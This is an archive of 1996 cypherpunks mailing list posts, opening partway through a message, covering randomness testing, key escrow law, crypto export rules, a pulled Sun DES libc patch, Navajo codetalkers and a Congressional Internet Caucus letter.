just because code is authenticated, that doesn't necessarily 
mean it's trusted

As technical info on those things is written down, we'll put it
on our web site for review and criticism - 

Marianne
JavaSoft, Sun Microsystems
mrm@eng.sun.com
mrm@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Campbell <campbell@c2.org>
Date: Sat, 30 Mar 1996 06:09:35 +0800
To: cypherpunks@toad.com
Subject: xnoisesph.c
Message-ID: <199603291331.FAA09008@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

It looks like the original headers got stripped off of this (at
toad?).  Could the author of xnoisesph.c please contact me directly?
I have some questions about the code.  Thanks.

			Rick

- ------- Forwarded Message

From: owner-cypherpunks@toad.com
Date: Fri, 29 Mar 1996 07:09:16 -0500

Mutatis Mutantdis writes:

> >I've got a short program for the PC (w/TPascal source) that plots a 
> >noise sphere from a file of (pseudo) random data,

. . .

Here's a version of it for X Windows, translated into plain-old C. 

. . .

  xnoisesph.c

  Compiled on Linux with:
	cc -o xnoisesph xnoisesph.c -L /usr/X11R6/lib -lX11 -lm

- ------- End of Forwarded Message

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMVvlXxj0UvMeUesFAQHQ6gQAxdI8otmXPrHlPtmetv73Hq05dDqZNmgg
qDyrrKqVQyURElQ+82uWYpA/5WbhhcwGg0SUNn3hvR5pg4LouqyPQjMTb6C69nQF
eEHuSmym2MXE4TqDFhgMvbcv54m3ixHGa3RdhWMUeA4Y2il0+WwQJP+igcybJR95
JF4AAQagMzM=
=ePqE
-----END PGP SIGNATURE-----
--
Rick Campbell <campbell@c2.org>
  http://www.c2.org/~campbell/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 30 Mar 1996 04:08:16 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: So, what crypto legislation (if any) is necessary?
In-Reply-To: <m0u2SwS-0008y1C@pacifier.com>
Message-ID: <Pine.SUN.3.91.960329052243.23176A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 28 Mar 1996, jim bell wrote:

> At 03:46 PM 3/28/96 -0500, Black Unicorn wrote:
> >On Tue, 26 Mar 1996, Duncan Frissell wrote:
> >
> >> At 09:46 PM 3/25/96 -0500, Michael Froomkin wrote:
> >> 
> >> >An interesting issue, likely to be addressed in future judicial 
> >> >assistence treaties...
> >> 
> >> However, future judicial assistance treaties are meaningless if you store
> >> your keys anonymously (domestically or internationally) so that even the
> >> keeper doesn't know he has them or exactly where they are in his pile of 
> keys.
> >
> >Given the significant contempt charges that can follow a refusal to 
> >produce items (anonymous or not) this still depends on the absence of 
> >initial detection.
> 
> You clearly don't understand.  You're making the ASSumption that the 
> organization keeping the keys can produce them in a form that is "useful" to 
> the cops.  Escrowing encrypted keys makes them useless to subpoena, and in 
> fact it helps the key owner because the escrow agent can (and, in fact, 
> must!) be obligated to inform the key owner if his key is requested.

You clearly don't understand.  You are an ass making an assumption that a 
court cares or believes that the witness can actually produce the 
requested information or not.  Fines tend to be imposed regardless.
 
> You also seem to assume that "contempt charges" will be able to operate 
> world-wide, which is a highly dubious proposition.  (Read Froomkin's 
> paragraph above CAREFULLY.  He said "internationally.")  

Contempt charges do operate world wide.  The reach of U.S. jurisdiction 
is very extensive and the United States generally doesn't care what the 
foreign jurisdiction thinks of it.

See my large note on asset concealing.

> And in any case, I consider it highly doubtful that anybody would contract 
> with an escrow agent and identify himself by name

The same way no one creates Panamanian companies with their own name.  So 
what?  Third parties are still fined heavily.

 It would be a simple 
> matter to operate "escrow agents," just glorified data-holders, who would 
> receive data anonymously and send it out just as anonymously, to the person 
> who can identify themselves via some sort of encrypted ID system.

And simpler for courts to fine them out of existance (which happened to 
several banks, trust companies and agents in Cayman and Panama).

   Even 
> "detecting" such a transfer is useless because the cops won't be able to 
> figure out what the data is, since it's encrypted in both directions while 
> being transferred, in addition to being encrypted while being held, with a 
> code the escrow agent doesn't know.

They need only suspect or have reason to suspect it might be exculpatory.
Practically speaking this means convincing a judge.  Not hard when the 
words "offshore holding company" are mentioned in a brief or hearing.

> In short, you need to comprehend what you're responding to before you 
> express your opinions.  You're living down to my expectations.

In short, go to law school, then try to talk about legal issues.

> >> In fact, I suppose that government operation of the identification system
> >> (drivers' licenses, passports, etc.) in general is also horribly inefficient
> >> and should be attacked on efficiency grounds.
> >
> >You might not like what you get in response.  Streamlined and uniform 
> >identity documents generated at birth and renewed with tax filings would 
> >be the likeliest efficiency improvement.  An inefficient government 
> >identification system is to the advantage of the privacy seeker.
> 
> You seem to be ASSuming that an "efficient identification system" is one 
> that will ALSO operate to the benefit of the government, as opposed to the 
> individual who wants to be identified for only limited purposes.

Without getting into semantics, and "efficient identification system" 
implies one that identifies people efficently.  Blocking government use, 
or limiting it to certain circumstances is not efficiency.

> I don't think so.

Opinions are like assholes....

> Chaum's encrypted ID system described in the August 1992 
> Scientific American makes it clear that identification can occur without the 
> ability to cross-reference databases.  Chaum's system, if implemented with 
> current microprocessor technology, would be extremely "efficient," at least
                                                                     ^^^^^^^ 
> from the standpoint of the amount of human effort involved.  It would, 
> however, be extremely hostile to the government.

Hedge just a bit more and your argument will be completely underground.

> Jim Bell
> jimbell@pacifier.com

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 30 Mar 1996 15:46:25 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: So, what crypto legislation (if any) is necessary?
In-Reply-To: <m0u2SwS-0008y1C@pacifier.com>
Message-ID: <Pine.SUN.3.91.960329054254.23176D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 28 Mar 1996, jim bell wrote:

> Escrowing encrypted keys makes them useless to subpoena, and in 
> fact it helps the key owner because the escrow agent can (and, in fact, 
> must!) be obligated to inform the key owner if his key is requested.

I thought I would take the time to let everyone know that this is 
baseless as well.  Most jurisdictions forbid third parties to reveal 
prosecution inquries to the principal for which they are holding 
documents or other information.  A VERY few have laws on the books that 
require this disclosure.  Switzerland is no longer one of them.

Even if a judge was convinced by the defense not to levy heavy fines 
against a third party who pleaded that he or she was simply unable to 
comply, informing the principal would literally assure such fines would 
be imposed regardless.  Criminal charges of obstruction could easily 
attach.  Obstruction in connection with narcotics cases or other major 
felonies are generally extraditable offenses as well.

Once again Mr. Bell pulls legal analysis out of his rectum rather than 
basing it in fact or research.

With Mr. Bell as a defense attorney, who needs prosecutors?

> Jim Bell
> jimbell@pacifier.com

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Sat, 30 Mar 1996 01:45:01 +0800
To: Jeff Barber <jeffb@sware.com>
Subject: Re: Random Number Testing
Message-ID: <199603291150.GAA16425@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 28 Mar 96 at 15:32, Jeff Barber wrote:
[..]
> Here's the bottom line to this discussion.  Tests that various people on
> and off this list have run show some evidence that there *is* "entropy"
> to be derived from loop timings (well, actually from a combination of
> clock-related, OS-related, and other peripheral-related activities that
> cause variations in loop timings).
[..]
> But, IMO, they qualify as software-only because the interface to the
> hardware is indirect and, at least potentially, non-system-specific.

I disagree.  The methods of timing (how to sample a specific timer) 
and the various interactions  that generate the entropy *are* system 
specific.  Code written for Suns won't work on PCs or Amigas or Macs, 
etc.  The implementation would probably be better if it were built 
into the OS, which rules out Win95, DOS, OS/2, Macs, etc. (unless the 
companies decide to add such a feature...)

> This leaves several questions that may be of interest to cypherpunks:
> 
> -	Is this apparent entropy really *unpredictable* (the most useful
> 	definition of "random" for cryptographic purposes)?

Good question. You'd need to look for patterns.  Barring none, you'd 
have to guess the factors that lead to the entropy, and then see if 
there's a way to reverse-engineer it. (Perhaps use a stripped down 
system and build it up, or disable some of the hardware and OS 
features etc.)

> -	Is there any way to harvest this entropy in a way that is safe to
> 	use for cryptographic purposes?
> 
> -	If so, how much of this "apparent entropy" needs to be collected
> 	in order to get a given quantity of "true entropy"?

Another question: how do you estimate entropy?
 
[..]


 
Rob. 

---
Send a blank message with the subject "send pgp-key" (not in
quotes) to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rollo@artvark.com (Rollo Silver)
Date: Sat, 30 Mar 1996 14:23:07 +0800
To: "David K. Merriman" <merriman@arn.net>
Subject: Re: Let's *NOT* "Raise their Awareness"
Message-ID: <v02130509ad807192ba6b@[198.59.115.151]>
MIME-Version: 1.0
Content-Type: text/plain


>>On Tue, 26 Mar 1996, David K. Merriman wrote:

>>Yes, and some years ago a State legislature (I forget which) passed a
>>resolution setting the value of pi at exactly 3.

Well, this one has a grain of truth in it, but has drifted a bit in the telling.

>From <alt.folklore.urban>'s FAQ:

T. *Indiana House Bill #246 of 1897 would've set pi=3.2. Killed in state Senate.

Fb. Some state (e.g., KS, OK, etc.) once considered a bill setting pi = 3
(or some other arbitrary, non-transcendental number).

Key to Listed FAQs:
T  = 100% scientific truth
Tb = believed true, but not conclusively proven
F  = 100% falsehood
Ft = A legend, mostly untrue, but with a true occurrence or known origin.
Fb = believed false, but not conclusively proven

There is a comment, "*", on certain lines in the FAQ.  This indicates that
there is further information on this point available via anonymous ftp.
See the AFU anonymous ftp sites noted in Part I of the FAQ for more
information.

The four part FAQ for alt.folklore.urban is also available via anonymous
ftp at rtfm.mit.edu.  You can retrieve them by grabbing the following
files:
/pub/usenet/news.answers/folklore-faq/part1
/pub/usenet/news.answers/folklore-faq/part2
/pub/usenet/news.answers/folklore-faq/part3
/pub/usenet/news.answers/folklore-faq/part4
/pub/usenet/news.answers/folklore-faq/part5
Or heck, just do:
/pub/usenet/news.answers/folklore-faq/part*

Rollo Silver                | e-mail: rollo@artvark.com                  |
Artvark                     | Home page: http://www.artvark.com/artvark/ |
PO Box 219                  | Voice: 505-586-0197                        |
San Cristobal, NM 87564 USA | Compuserve 71174,1453                      |
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rollo@artvark.com (Rollo Silver)
Date: Sat, 30 Mar 1996 07:15:41 +0800
To: cypherpunks@toad.com
Subject: Re: Randomness paper (posting it)
Message-ID: <v02130501ad80da8449cc@[198.59.115.151]>
MIME-Version: 1.0
Content-Type: text/plain


OK. Post it WHERE?

>> Postscript, only in FrameMaker format, or as Interchange - MIF or as Text.
>
>If you can save it as text, then please post it as text.
>
> Yiorgos Adamopoulos        adamo@noc.ntua.gr
> National Technical University of Athens, NOC

Rollo Silver                | e-mail: rollo@artvark.com                  |
Artvark                     | Home page: http://www.artvark.com/artvark/ |
PO Box 219                  | Voice: 505-586-0197                        |
San Cristobal, NM 87564 USA | Compuserve 71174,1453                      |
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 30 Mar 1996 14:19:13 +0800
To: cypherpunks@toad.com
Subject: POT_ktl
Message-ID: <199603291247.HAA12258@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   3-29-96 NYT reports on the Montana Freemen's competition
   with the USG: printing money and fostering free market
   brigandry; building arsenals for terrorizing the weak and
   suppressing dissent; amassing national security treasure
   for the protection of the people; and PC education to boot.

   The USG, looking in the mirror, says such actions are a
   criminal conspiracy, a "school for crime."


   POT_ktl






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sat, 30 Mar 1996 05:31:04 +0800
To: cypherpunks@toad.com
Subject: Re: Why Americans feel no compulsion to learn foreign languages
In-Reply-To: <Pine.SV4.3.91.960328182624.8987G-100000@larry.infi.net>
Message-ID: <4uyJLD6w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Alan Horowitz <alanh@mailhost.infi.net> writes:

> Certainly, I believe TCM's proposition that there is no "economic need"
> for an American to learn a second language.
>
> On the other hand, I haven't seen any demonstration of the "value" of
> learning history. Yet, who would argue that ignorance of history is a
> good policy to follow?

Likewise, Tim says there's no value in learning about "traditional" crypto.
I say there is.
There's a value in convinving a child to learn a second language (at least 1)
or history or geometry: it improves his/her thinking process in general.
Sure beats baseball (one of the things I dislike most about the U.S.)
As someone pointed out, most monolingual Americans can't use English properly.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Sat, 30 Mar 1996 15:11:47 +0800
To: perry@piermont.com
Subject: Re: Edited Edupage, 24 March 1996
Message-ID: <199603291625.IAA09564@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger wrote:
> 2) I strongly hope that Netscape tries to move the product towards
>    standards based mechanisms like the IETF's RTP protocol, which are
>    in widespread use,

Unfortunately RTP is not a crypto protocol, and does not have a 
standardized encrypted form.  

Therefore any encrypted protocol is necessarily proprietary and
non standard, unless Phill Zimmerman has published a standard.

If Netscape creates a standard for encrypting RTP, and publishes it,
that will be a move towards a standard, not a move away from a standard.

One mechanism for encrypting RTP would be to construct a shared secret
key by DH exchange, or Rabin if one wished to dodge patents, construct
a cryptographically strong pseudo random data stream from the key, using
Ron's code, and for each RTP packet, encrypt using a block from that 
data stream as the packet key.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Sat, 30 Mar 1996 15:36:27 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Why Americans feel no compulsion to learn foreign languages
In-Reply-To: <ad8095cb33021004495e@[205.199.118.202]>
Message-ID: <199603291526.IAA17231@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain




Tim May writes:

> Given the explosion of languages--Yoruba, Talegu, Tagalog, Russian, Korean,
> and on and on--the role of French, German, and to some extent Spanish is
> less clear than ever. (Spanish is admittedly a growing language, but not in
> technical fields...just a fact.)

Entirely brushing aside the idea that there might be more to the world than
technical fields, my observation has been that knowing at least one
foreign language would be an enormous professional advantage. At one
computer company I worked for, the only person who could speak Italian was
in constant demand as an informal translator. Doing research, I have had
a number of occasions to regret my lack of proficiency with a foreign
language. I regularly come into contact with German and Spanish speaking
scientists. (Probably number one on the hit parade is Chinese, but I'm
kind of daunted by the idea of taking it on ;-). Granted, English is
the technical lingua franca, but the statement that there's no point in
learning a foreign language is shortsighted, and I think that will become
more true, not less, in the future.


> My last word on this language topic will be this: far from being a closed,
> ignorant, immigrant-hating, shit-eating nation, as some of the usual
> America bashers have intimated, the decline of language skills reflects a
> decline in the "ethnocentrism" of the past.

And besides, you only need Spanish for maids, gardeners, and day-laborers,
right?


                                  -- Will





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sat, 30 Mar 1996 06:27:14 +0800
To: jimbell@pacifier.com>
Subject: Re: New crypto bill to be introduced
In-Reply-To: <m0u2TSC-0008zmC@pacifier.com>
Message-ID: <clKyQQu00YUvM23ml2@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Two observations:

* Jim Bell would be unduly suspicious if _anyone_ introduced a crypto
bill in Congress. I'm not surprised that here on conspiracypunks someone
would be raising alarums without knowing what they're talking about.

* Jim Bell says we're "overdoing it on this 'List of Shame' thing." Not
at all -- we're proud to be on it! And you, Jim Bell, are one of my
primary suspects for authorship.

-Declan



Excerpts from cypherpunks: 28-Mar-96 Re: New crypto bill to be i.. by
jim bell@pacifier.com 
> While this does sound like progress, I'm suspicious.   Peter Junger's 
> analysis raised serious doubt as to the ability of bill to open up the 
> crypto export market as it purported to.  
>  
> And where, exactly, did this these changes come from?  Who was consulted?  
> What recommendations were NOT taken?
>  
>  
> >We have put our "List of Shame" numbers on our nametags.
> >-Declan
>  
> You're overdoing it on this "List of Shame" thing.  You don't know 
> who actually made those anonymous postings, and it's been observed that 
> those names seem to correspond nicely with an NSA-hate list.  It would not 
> take a great deal of imagination to conclude that the NSA was motivated to 
> de-focus our anger at the Leahy bill and replace it with a great deal of 
> back-stabbing commentary.  (If that was the intent, it succeeded...)
>  
> On the other hand, I've also noticed that there hasn't been a lot of 
> specific analysis of the Leahy bill in the last few weeks, and my suggestion 
> that the Leahy bill be informally re-written to address Junger's objections 
> (as well as my own, and Tim May's, etc) has not resulted in a great deal of 
> repair work.  Now, miraculously, a replacement bill appears that includes 
> SOME repairs.  (obviously, we have to wait to hear how most of it
comes out...)
>  
>  
> I get the impression that we are being sequentially offered ice cream cones 
> with decreasing amounts of poison in them, in the hopes that at some point 
> we'll bite.  It seems to me that whoever is writing these bills should be 
> willing to make a statement about what his goals are, and who he's talking 
> to as he crafts them, and what changes he was UNwilling to include.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Sat, 30 Mar 1996 11:07:44 +0800
To: Black Unicorn <jimbell@pacifier.com>
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <199603291652.IAA10994@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 28 Mar 1996, jim bell wrote:
> > Escrowing encrypted keys makes them useless to subpoena, and in 
> > fact it helps the key owner because the escrow agent can (and, in fact, 
> > must!) be obligated to inform the key owner if his key is requested.

At 05:49 AM 3/29/96 -0500, Black Unicorn wrote:
> I thought I would take the time to let everyone know that this is 
> baseless as well.  Most jurisdictions forbid third parties to reveal 
> prosecution inquries to the principal for which they are holding 
> documents or other information.  A VERY few have laws on the books that 
> require this disclosure.  Switzerland is no longer one of them.

If you had actually read the article that you criticize you would
have noticed that the "must" was enforced by cryptographic 
protocols, not by the blunt sword of the law.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 30 Mar 1996 14:56:37 +0800
To: "Vincent S. Gunville" <vingun@rgalex.com>
Subject: Re: Councilman/Usenet porn case...
In-Reply-To: <315AB3E4.41B6@rgalex.com>
Message-ID: <Pine.SUN.3.91.960329091447.24449C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 28 Mar 1996, Vincent S. Gunville wrote:

> Here is an example of what anonymous remailers can 
> do.......

[...]

You need to start reading the material you use to support your positons:
Especially this paragraph.

> >    But here's a reality check. The Finnish remailer could not have been
> >    used, since anon.penet.fi no longer transmits binary image files.
> >    Jerry Russell, who runs Florida Online and who looked into the case,
> >    says he figures the whole thing was a relatively simple prank called a
> >    sendmail spoof, in which the prankster posts a message with a phony
> >    return address. He says the Willowick police never produced a copy of
> >    the posting for him so that he could unravel the tangle for them.
> >    Indeed, when the policeman called, "he didn't really understand what
> >    he was trying to tell me," says Russell. "The average Joe Blow police
> >    detective doesn't know flip about the Internet."



> -- 
> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
> |Vincent S. Gunville     
> |Robbins-Gioia		 
> |209 Madison St                       Email  vingun@rgalex.com
> |Alexandria, Va 22314    
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alan B. Clegg" <abc@gateway.com>
Date: Sat, 30 Mar 1996 15:03:50 +0800
To: bsdi-isps@gateway.com
Subject: Mailing lists moving site!  (list outages may occur)
Message-ID: <Pine.BSI.3.91.960329090911.2882C-100000@black-ice.gateway.com>
MIME-Version: 1.0
Content-Type: text/plain


The physical and network location of the machine doing mail service for 
gateway.com will be moving some time around March 31/April 1.  Hopefully, 
service will not be interrupted for more than about 3-4 hours, but I 
can't promise anything (the system will be moving to my side of an ISDN 
circuit instead of living on-site with one of my clients).

This move will affect the following mailing lists:

			bsdi-users
			bsdi-users-d
			cypherpunks-d
			unix-lizards

There may also be an impact on other lists as routing for the gateway.com 
domain is moved from its current 192.x.x.x network to a CIDR block under 
another provider.  The other lists involved will be:

			bsdi-isps
			cheapnet
			humor
			xconq
			
Sorry about this, but over-all, service will be better after the move (I 
will once again, be the master of my network's destiny [or something like 
that])

-abc

                                      \             Alan B. Clegg
         Just because I can            \         Network Technologist
        does not mean I will.           \          gateway.com, inc.
                                         \     <http://www.gateway.com/>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Casper.Dik@Holland.Sun.COM (Casper Dik - ENS Network Security - Network Security Engineer)
Date: Sat, 30 Mar 1996 19:14:47 +0800
To: cypherpunks@toad.com
Subject: Re: Sun patch pulled
Message-ID: <199603290826.JAA01442@room101.Holland.Sun.COM>
MIME-Version: 1.0
Content-Type: text/plain


>>I noticed that Sun's latest libc patch (101759-04) is empty.  Previous
>>versions contained the complete U.S. version of libc, including the
>>tres-dangerous DES and crypt functions.  In the current rev only the
>>README remains, presumably because:
>>	EXPORT INFORMATION: This patch includes code which performs
>>	cryptographic functions, which are subject to U.S. export
>>	control, and must not be exported outside the U.S. without
>>	prior approval of the U.S. government.  Prior export approval
>>	must be obtained by the user of this patch.

>The 101759-?? patch is missing from the Feb 1996 SunSolve Patches CD. However
>if one pops in the November 1995 Patches CD there is a nice little copy of
>the 101759-03 patch which also comes with the above warning and the DES
>enabled libraries.


The wide distribution of the DES enabled libc.so was a mistake, as it
made DES code available world wide.  Now it's no longer even available from
our patchserver in the local office in the Netherlands.

The "Doemstic" libc patch is only required for thsoe sites that have installed
the "U.S. Encryption kit".

If you can't get hold of the patch through official channels, it
*is* possible to take the international version, take the DES modules
from your U.S. Encyption kit and build a new libc.a and libc.so
(the latter utilizing the files form /usr/lib/shlib.etc).
It's a lot more work, but unfortunately Sun can't distribute the
library the easy way.

Casper




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sat, 30 Mar 1996 11:23:44 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: Canada's ISO standards body?
In-Reply-To: <Pine.3.89.9603281502.A24841-0100000@tesla.cc.uottawa.ca>
Message-ID: <Pine.SOL.3.91.960329093051.8635B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 28 Mar 1996 s1113645@tesla.cc.uottawa.ca wrote:

> Speaking of which, could someone tell me who Canada's standards body and 
> rep to the ISO is (and if that's where I've gotta go to get my hands on X.509
> and all those other X.docs.). Any addresses would be helpful too.

Try www.itu.org (X. series docs come from the ITU, not ISO. Same text 
though).

I don't think v3 has been balloted yet - that gives you a chance to 
explore one of the more amusing twists of OSI standardisation- you can 
get copies for free of most drafts from the editor right up until it gets 
standardised. Silly, isn't it. 

Simon

----
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sat, 30 Mar 1996 15:01:06 +0800
To: "Michael E. Carboy" <carboy@hooked.net>
Subject: Re: NOISE: Scriveners Attack C-Punks
In-Reply-To: <199603290008.QAA11067@get.hooked.net>
Message-ID: <Pine.SOL.3.91.960329093804.8635C-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


[unsubscrive commentary]

This is cypherpunks- cypherpunks have colds.

---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Loysen <dwl@hnc.com>
Date: Sat, 30 Mar 1996 19:35:33 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199603291755.JAA25340@spike.hnc.com>
MIME-Version: 1.0
Content-Type: text/plain



> 
>The Navajo/Na Dene codetalkers (WW II) developed a real arcane jargon,
>so I was told.  Maybe it was because the conditions of war were
>completely different than their language's environment so they
>were forced to invent words, or maybe they thought it was a good
>idea, or whatever.  But I believe transcripts of their transmissions
>are often mostly unintelligible to native Navajo speakers who weren't in
>the know.
>
>
>
It is my understanding that the codetalkers invented very few new words,
they simply combined the words they already had to create descriptions of
things that the language was never meant for. One of the reasons they were
so successful was that more than one phrase could mean the same thing. For
example, both 

"A flock of eagles with fire in their bellies is coming from the rising sun"

and

"Many birds are flying from the east to rain fire on you"

Could reliably be translated to "There are bombers coming from the east"

Add some new words for specifics that you needed (like altitudes and compass
directions) and the codetalkers presented the bad guys with a language that
was completely unrelated to anything they had heard before.

Also (I copied this from RSA) "The Navaho language is so difficult to learn
and its linguistics are so complex that it is virtually impossible for a
non-native speaker to counterfeit its sounds. Furthermore, Navaho seems to
have no linguistic connections to any other Asian or European language.
Consequently, at any given time, there are only a few thousand people
capable of speaking the tongue. For these reasons, the U.S. military made
extensive use of hundreds of Native American codetalkers . During World War
II, Navaho codetalkers relayed operational orders in the Pacific theater
with a level of security that was unattainable by current encryption
algorithms. The Japanese signal corps task was further complicated by the
codetalkers liberal mix-in of Navaho and military slang resulting in a
communications network so secure that it was, in fact, never compromised by
Axis powers." 

In my stone age level of Crypto understanding I would liken this to having a
public key that was the Navajo culture and an algorithm to process it that
only runs on the human brain. Makes me wonder when somebody will set two AI
computers down and tell them to invent a code we can't break.

dwl@hnc.com		
David Loysen		
619-546-8877 x245		
			





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sat, 30 Mar 1996 11:23:00 +0800
To: cypherpunks@toad.com
Subject: Open letter from the Congressional Internet Caucus
In-Reply-To: <315C21A7.37BF@hr.house.gov>
Message-ID: <YlKzx6u00YUv04QVsG@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message begins here ----------

Date: Fri, 29 Mar 1996 09:45:11 -0800
From: Congressional Internet Caucus <inetcauc@hr.house.gov>
Organization: U.S. House of Representatives
X-Mailer: Mozilla 2.0 (Win16; I)
Mime-Version: 1.0
To: fight-censorship+@andrew.cmu.edu
Subject: Open letter from the Congressional Internet Caucus

To the Internet Community at-large,

Finally, there is something that both Democrats and Republicans can agree
on -- it is time to get Congress on-line for the 21st Century.

Over the past few years, the Internet has changed the way we communicate,
do business and educate our children. Millions of people log-on to the
Internet each day to send and receive information. And this new medium 
has
created thousands of new jobs in our nation's economy.

As more and more people go on-line and as the Internet becomes a greater
part of our daily lives, new questions arise about how to deal with this
new medium. Members of Congress are having to make policy decisions on
Internet issues that will impact our future.

What role, if any, will the federal government have in developing the
Internet? How will Congress respond to Internet-related issues? From
encryption to indecency, copyright protection to universal service,
Congress will need to make prudent public policy decisions about a medium
that presents such enormous opportunities for all Americans.

Congress must not make these decisions without the full understanding of
and familiarity with the Internet.

The Internet will also transform Congress and the government. From
communicating with constituents to making government documents available
on-line, we need to move into the Information Age NOW.

Members of Congress need to use the Internet.

To solve some of these problems, we are forming the Internet Caucus: a
bipartisan, bicameral group of members with diverse viewpoints. What we
share is a mutual concern for promoting the Internet. We will not just 
talk
the talk. Caucus members will walk the walk into cyberspace by signing a
pledge to 1) educate themselves about the Internet, 2) get on-line, 3) 
and
educate other members about the Internet.

The caucus will also serve as a clearinghouse of information for the 
public
and other offices about Internet related issues. With the assistance of 
an
advisory committee comprised of public interest groups, industry, and
respected experts on the Internet, members will discuss and debate policy
options.

We look forward to getting your input on the many issues before Congress.
See you on-line!

Sincerely,

Congressman Rick White
http://www.house.gov/white/

Senator Patrick Leahy
http://www.house.gov/~leahy

Congressman Rick Boucher
http://www.house.gov/boucher/welcome.htm

Senator Larry Pressler
http://www.senate.gov/senator/pressler.html

Speaker Newt Gingrich
mailto:georgia6@hr.house.gov

Congressman Jack Fields

Congressman Edward Markey

Congressman Mike Oxley
http://www.house.gov/oxley/welcome.html

Congressman Christopher Cox

